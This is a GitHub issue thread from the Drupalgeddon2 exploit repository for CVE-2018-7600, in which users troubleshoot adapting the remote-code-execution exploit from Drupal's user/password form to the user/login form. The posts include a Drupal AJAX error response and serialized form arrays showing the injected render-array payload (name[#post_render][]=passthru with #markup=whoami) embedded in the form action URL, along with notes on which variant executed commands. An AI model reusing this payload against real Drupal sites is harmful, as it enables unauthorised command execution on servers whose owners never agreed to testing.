search

dreadlocked / Drupalgeddon2

Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)
580 stars 173 forks source link

using the user/login instead user/password? #58

Open intrd opened 5 years ago

intrd commented 5 years ago

Thank u guys for this xpl,

I was trying to make this work w/ user/password form instead user/login(disabled),

[{"command":"settings","settings":{"basePath":"\/drupal-7.43\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"ujFkz760YMJYxE-x5scsgNLjtT8tG0d6YB_gCizLJ-U"}},"merge":true},{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cdiv class=\u0022messages error\u0022\u003E\n\u003Ch2 class=\u0022element-invisible\u0022\u003EError message\u003C\/h2\u003E\n \u003Cul\u003E\n \u003Cli\u003E\u003Cem class=\u0022placeholder\u0022\u003ENotice\u003C\/em\u003E: Undefined index: #value in \u003Cem class=\u0022placeholder\u0022\u003Efile_ajax_upload()\u003C\/em\u003E (line \u003Cem class=\u0022placeholder\u0022\u003E262\u003C\/em\u003E of \u003Cem class=\u0022placeholder\u0022\u003EC:\xampp\htdocs\drupal-7.43\modules\file\file.module\u003C\/em\u003E).\u003C\/li\u003E\n \u003Cli\u003E\u003Cem class=\u0022placeholder\u0022\u003ENotice\u003C\/em\u003E: Undefined index: #suffix in \u003Cem class=\u0022placeholder\u0022\u003Efile_ajax_upload()\u003C\/em\u003E (line \u003Cem class=\u0022placeholder\u0022\u003E280\u003C\/em\u003E of \u003Cem class=\u0022placeholder\u0022\u003EC:\xampp\htdocs\drupal-7.43\modules\file\file.module\u003C\/em\u003E).\u003C\/li\u003E\n \u003C\/ul\u003E\n\u003C\/div\u003E\n\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":{"basePath":"\/drupal-7.43\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"ujFkz760YMJYxE-x5scsgNLjtT8tG0d6YB_gCizLJ-U"}}}]

I also changed the form_id, I think the problem was on _triggering_element_name..

intrd commented 5 years ago

..additional information:

serialized object on user/password (rce work)

a:16:{s:4:"name";a:6:{s:5:"#type";s:9:"textfield";s:6:"#title";s:26:"Username or e-mail address";s:5:"#size";i:60;s:10:"#maxlength";i:254;s:9:"#required";b:1;s:14:"#default_value";a:3:{s:12:"#post_render";a:1:{i:0;s:5:"passthru";}s:5:"#type";s:6:"markup";s:7:"#markup";s:6:"whoami";}}s:7:"actions";a:2:{s:5:"#type";s:7:"actions";s:6:"submit";a:2:{s:5:"#type";s:6:"submit";s:6:"#value";s:19:"E-mail new password";}}s:8:"#form_id";s:9:"user_pass";s:9:"#build_id";s:48:"form-RVaa72twEpNMiJbkNILI5EQoPyjBswMxbHExHX-J4bo";s:5:"#type";s:4:"form";s:13:"form_build_id";a:5:{s:5:"#type";s:6:"hidden";s:6:"#value";s:48:"form-RVaa72twEpNMiJbkNILI5EQoPyjBswMxbHExHX-J4bo";s:3:"#id";s:48:"form-RVaa72twEpNMiJbkNILI5EQoPyjBswMxbHExHX-J4bo";s:5:"#name";s:13:"form_build_id";s:8:"#parents";a:1:{i:0;s:13:"form_build_id";}}s:7:"form_id";a:4:{s:5:"#type";s:6:"hidden";s:6:"#value";s:9:"user_pass";s:3:"#id";s:14:"edit-user-pass";s:8:"#parents";a:1:{i:0;s:7:"form_id";}}s:3:"#id";s:9:"user-pass";s:7:"#method";s:4:"post";s:7:"#action";s:120:"/drupal-7.43/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=whoami";s:15:"#theme_wrappers";a:1:{i:0;s:4:"form";}s:5:"#tree";b:0;s:8:"#parents";a:0:{}s:9:"#validate";a:1:{i:0;s:18:"user_pass_validate";}s:7:"#submit";a:1:{i:0;s:16:"user_pass_submit";}s:6:"#theme";a:1:{i:0;s:9:"user_pass";}}

serialized object on user/login (rce not work)

a:17:{s:4:"name";a:6:{s:5:"#type";s:9:"textfield";s:6:"#title";s:8:"Username";s:5:"#size";i:60;s:10:"#maxlength";i:60;s:9:"#required";b:1;s:12:"#description";s:26:"Enter your bpsbr username.";}s:4:"pass";a:4:{s:5:"#type";s:8:"password";s:6:"#title";s:8:"Password";s:12:"#description";s:50:"Enter the password that accompanies your username.";s:9:"#required";b:1;}s:9:"#validate";a:3:{i:0;s:24:"user_login_name_validate";i:1;s:32:"user_login_authenticate_validate";i:2;s:25:"user_login_final_validate";}s:7:"actions";a:2:{s:5:"#type";s:7:"actions";s:6:"submit";a:2:{s:5:"#type";s:6:"submit";s:6:"#value";s:6:"Log in";}}s:8:"#form_id";s:10:"user_login";s:9:"#build_id";s:48:"form-kpb7PWBlRuJoZSQpcwIJs5fVSyHei_MJqIEs5VWJaSg";s:5:"#type";s:4:"form";s:13:"form_build_id";a:5:{s:5:"#type";s:6:"hidden";s:6:"#value";s:48:"form-kpb7PWBlRuJoZSQpcwIJs5fVSyHei_MJqIEs5VWJaSg";s:3:"#id";s:48:"form-kpb7PWBlRuJoZSQpcwIJs5fVSyHei_MJqIEs5VWJaSg";s:5:"#name";s:13:"form_build_id";s:8:"#parents";a:1:{i:0;s:13:"form_build_id";}}s:7:"form_id";a:4:{s:5:"#type";s:6:"hidden";s:6:"#value";s:10:"user_login";s:3:"#id";s:15:"edit-user-login";s:8:"#parents";a:1:{i:0;s:7:"form_id";}}s:3:"#id";s:10:"user-login";s:7:"#method";s:4:"post";s:7:"#action";s:120:"/drupal-7.43/?q=user%2Flogin&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=whoami";s:15:"#theme_wrappers";a:1:{i:0;s:4:"form";}s:5:"#tree";b:0;s:8:"#parents";a:0:{}s:7:"#submit";a:1:{i:0;s:17:"user_login_submit";}s:6:"#theme";a:1:{i:0;s:10:"user_login";}}

..as we can see, the passthru(whoami) are not injected.

RogueSMG commented 4 years ago

Is this figured out yet? I'm having the same issue. Getting json in response but the command doesn't trigger.